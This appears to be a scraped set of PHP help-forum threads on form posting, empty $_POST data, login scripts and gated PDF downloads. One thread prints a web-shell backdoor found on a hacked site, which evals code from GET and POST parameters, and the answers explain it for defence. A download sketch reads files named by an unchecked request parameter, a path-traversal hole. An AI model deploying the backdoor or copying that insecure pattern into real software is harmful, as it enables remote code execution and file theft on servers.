So I'm having a problem with a form I've made so one user can e-mail other users based on role fans , players or the admin.
500 "Internal Server Error":
Documentation:
http://www.cyberciti.biz/tips/http-error-500-internal-server-for-php-pages-and-solution.html (first page on google...)
You may be getting that error because of a .htacces file that is being "disturbed" by your code :) . But is generally caused by the php settings on your server. Check the integrity of the php (.ini) files on the system and search for any file that might be missing or incomplete.
EDIT:
Because you get an error when mailing.... check the part of your system php files (.ini) that are related to that.
The two files are located in the same folder?
In order to debug if the file is working you can "echo" a dummy content at the beginning of the file to test that you are going to that file (echo "worked";), then you can echo your $_POST data and check it, maybe you must check if $_POST is set : if( (isset($_POST)) AND (isset($_POST['user_name'])) ){}
Related
This is my my index.php file
<?php
print_r($_POST);
exit;
?>
I'm posting to my website using postman in chrome, but nothing gets there. I get back only
Array
(
)
I know that postman works because I used it when I had free webhosting. Now I asked a friend for a little space on his website, but for some reason the post data is not printed.How can I solve this ?
Here is a photo with what is happening: http://6pix.net/images/16687663370157764163.png .
Here are the Possible Mistakes and the way to debug it
1. Check if your web server supports php
You can check this by running a .php file with some output statements such as echo
2. Check if you are pointing the page properly
You shall check this by outputting some content
3. Try with full path
Some servers needs to get full path i.e., it won't support point the index.html or index.php if the directory path was given
Additional Note :
If the above issues doesn't helps then you might check with the .htaccess , blocking of REST Calls etc.,.
If you really (like shown within your screenshot) do
print_r($_REQUEST);
please check your php.ini for your
request_order
variables_order
If "post" is not within that order, $_REQUEST will not have "post" content inside.
My apologies for asking this question that I'm sure has been done before.
I'm not that knowledgable as far as PHP so the research I've done on this has been fruitless.
I've purchased and used an HTML template which has an email subscribe form at the bottom. The form is supposed to capture the entered email and add it to a text file with a list of submitted emails from what I understand.
Here is the excerpt from the html in the footer:
<form action="save-email.php" method="post" style="margin-top: 0px;">
<input type="text" name="email" placeholder="Get email updates...">
</form>
And here is the content of the corresponding save-email.php file:
<?php
$email = $_POST['email'];
$fp = fopen('submitted-emails.txt', 'a');
$savestring = $email . '
';
fwrite($fp, $savestring);
fclose($fp);
header('Location: ' . $_SERVER['HTTP_REFERER']);
?>
I've contacted the creators who pretty much told me to make sure my PHP version was up to date and that it was a server configuration error so they won't help me further...
I have PHP version 5.5.9 on an Ubuntu 14.04 Digital Ocean VPS
I've also edited the php.ini file to have register_globals turned on, but that did not help so I turned it off as I've read that is a security issue.
Any help would be greatly appreciated, thank you very much.
This answer is in another context then question Because I was here to check the solutions.
I was posting(method="post") the form but it was not posting the data. When I check the data with print_r($_POST) I was getting blank array.
I have felt this issue several times on servers.
The cause of this error is redirection from .htaccess file.
Some time it happens our site is running on http://www.example.com/* and we have created rules in .htaccess to redirect all the request to http://example.com/* to http://www.example.com/* or vice versa.
If post request is to different location then this issue occurs. So make sure the post url starting string should be same(www or without www check in url).
I have spent lot of time on the same issue but could not find the solution any where in stackoverflow. So I have given the solution.
Try to create a file with name submitted-emails.txt at the same directory with save-email.php and change the permissions of file to +w for all users.
Well, Are you sure post not working, Please check post method contains data or not by using.
var_dump($_POST); and var_dump($_REQUEST);
if you not found email id in post then it will be in request if it is then your request is submitting by get method.
if it display an array with email entered in post then your post method in working and problem is with file file was unable to open due to security problem/incorrect path or may be due to file permission. So check and let me know.
I have a file called q.php that has appeared in one of my websites. The site has been hacked. does anyone know what the file does?
<? error_reporting(0); if(#$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
<?=eval(#$_GET['q']);?>
<?php
if (!isset($_POST['eval'])) {die('');}
eval($_POST['eval']);
?>
It looks like it lets anyone execute php code that is passed in as a 'q' parameter in a get request, or any code in 'eval' param of a POST request. It suppress all associated errors.
This is as bad as it gets, and if your site isn't down already, I'd recommend taking it offline and auditing your servers very closely.
It runs the PHP code sent in the ?q= GET argument or the POST eval argument.
I would advice you to clean up your server and start from a clean installation again.
It will enable the attacker to execute any code.
If you pass code to that script either by ?q=code in the URL or by including it into a POST-Request into the eval parameter it will get executed.
So basically this is a remote code execution backdoor.
Nice. Not sure what the first line is for, but the two eval lines allow someone to execute any code they please on your server by passing it in the url or post data respectively.
The bigger question is how were the attackers able to upload the file in the first place. What that file contains is quite typical of code that is inserted so that attackers are able to execute code on your server without permission.
Merely deleting this file and any other files with rogue code in them is not fixing the problem, which is somehow attackers are able to upload files into your websites file repository.
At any rate, here is a complete breakdown:
1/ error_reporting(0);
Sets the error reporting to off.
2/ if(#$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
When the URL is called with /?wpth on the end, the URL is echo'd at the top of the page.
3/
This will execute any code included in the value of q. i.e. yourdomain.com/?q=base64_decode(%27somelongstringhere%27)
4/ if (!isset($_POST['eval'])) {die('');}
Kill the page execution if a post form variable called eval is not set.
5/ eval($_POST['eval']);
Execute any code posted from a remoted hosted form where the form variable is called eval
I was following a tutorial I found on how to create a simple login using sessions and a database. I followed it to the T (with the exception of tidying up all of the code because theirs was a mess and I'm OCD like that).
I get no errors at all on the page, it just comes up with a blank screen and I can't work out for the life of me why it's doing. I've been trying to get it working for the best part of about 3 hours.
There are 4 files:
index.php - Contains the form for the login script
login.php - Where the form data is processed, which is "require_once"'d into the index.php page at the very start.
config.php - Database connection info
cpanel.php - Where I want the user to be sent once they logged in
And here are those 4 files in action (although I guess they're not in action since they don't actually work!):
index.php
login.php
config.php
cpanel.php
And here's the tutorial I used.
Lastly here's a link to the original (non-source) index.php file
Hope you guys can help, it's driving me crazy now.
Just change
if($jackin) {
to
if(isset($jackin)) {
in login.php file
Also put ini_set('short_open_tag',1)
in your cpanel.php file if short_open_tag is disabled in php.ini
You should try error_reporting(E_ALL); for additional Error output. Check all POST Variables with an echo() / var_dump(), Check the Ifs also with echo() and make sure thats everything is OK.
The echo for $error is doubled.
Additional you should not use the Location Element on the Header with an relative Path.
Hi I am trying to redirect all links to any pdf file in my site to a page with a form in it that collects user info before they can proceed to download/view the pdf.
Eg
I want to redirect *.pdf files in web site to request.php?file=name_of_pdf_being_redirected
Where request.php is the page with the form on it asking for a few details before proceeding.
All pdf's in the site are held inside /pdf folder.
Any ideas?
EDIT: sorry I'm using Apache on the server.
OK I'M GETTING THERE:
I have it working now using:
RewriteEngine on
RewriteRule ^pdf/(.+.pdf)$ request.php?file=/$1 [R]
But now when it goes to the download page when i want to let the person actually download the file my new rule is spitting the download link back to the form :-P haha so is there anyway to let it download the file once the form has been submitted and you're on download.php?
Ideas? You could start by telling us which web/app server you're using, that might help :-)
In Apache, you should be able to use a RewriteRule to morph the request into a different form. For example, turning /pub/docs/x.pdf into request.php?file=/pub/docs/x.pdf could be done with something like:
RewriteRule ^/pdf/(.*)\.pdf/ request.php?file=/$1.pdf
Keep in mind this is from memory (six years since I touched Apache and still clean :-), the format may be slightly different.
Update:
Now you've got that sorted, here's a couple of options for your next problem.
1/ Rename the PDFs to have a different extension so that they're not caught by the rewrite rule. They should be configured to push out the same MIME type to the client so that they open in the clients choice of viewer.
2/ Do the download as part of the script as well, not as a direct access to the PDF. Since the submission of the form is a HTTP request, you should be able to answer it immediately with the PDF contents rather than re-directing them again to the download page.
That second option would be my choice since it:
stops people figuring out they can get to the PDFs just by requesting xx.pdfx instead of xx.pdf.
makes it quicker for the person to get the PDF (they don't have to click on the link again).
You can try this:
Move your files to a folder "outside" your web root so that no one can access it thru a browser
Use sessions to detect whether a person has completed the form or not
Use a php powered file download script. In its naivest form, it might look like this:
if ( isset( $_SESSION[ 'OK_TO_DOWNLOAD' ] ) == false )
{
header( "Location: must_fill_this_first.php" );
exit( 0 );
}
header( "Content-type: application/pdf" );
// double check the above, google it as i am not sure
echo file_get_contents( 'some_directory_inaccessible_thru_www/' . $_GET[ 'pdf_name' ] );
// ideally a binary-safe function needs to be used above
This is a tried and tested technique I used on a website. The code example is a draft outline and needs refinement.
Note, my answer is with respect to a .NET website, but I'm sure the same constructs exist somewhere in PHP.
I would have an HTTPModule with a path of *.pdf that simply does a Response.Redirect to request.php?...etc (in my case request.aspx) And then in the event handler for the button click on that page, when you know which pdf to display and that they're authorized, simple do a Response.ContentType = [MIME type of pdf], and then Response.WriteFile(pdfFile), and finally Response.End().
There are other things you can add to make it better, such as filesize, etc. But in the minimal case, this would work. If you want the code for it in C# I could come up with something in about 3 minutes, but in PHP i'm quite lost. I'd start out looking for HTTPModules and how to write them in PHP.
Googling for "PHP HTTPModule" leads to this: Equivalent of ASP.NET HttpModules in PHP so, I may be a little wrong, but hopefully that's a starting point.
Use an .htaccess file if you're using an Apache web server. You'll need to make certain that you have mod_rewrite enabled, but once you do you can rewrite all files using these two simple lines:
RewriteEngine On
RewriteRule ^.pdf$ /rewrite.php [NC,L]
If you are using IIS, you can accomplish something similar using ISAPI_Rewrite.
Your other alternative is to place your pdf's inside of a directory that is not publicly accessible and then any request made for a pdf resource would return an access denied error and the files could only be accessed through the appropriate download script.
if($user==authenticated){
//set pdf headers
echo file_get_contents('actual.pdf');
no mod re-writes, hides actual source and is what i normally do - hope this helps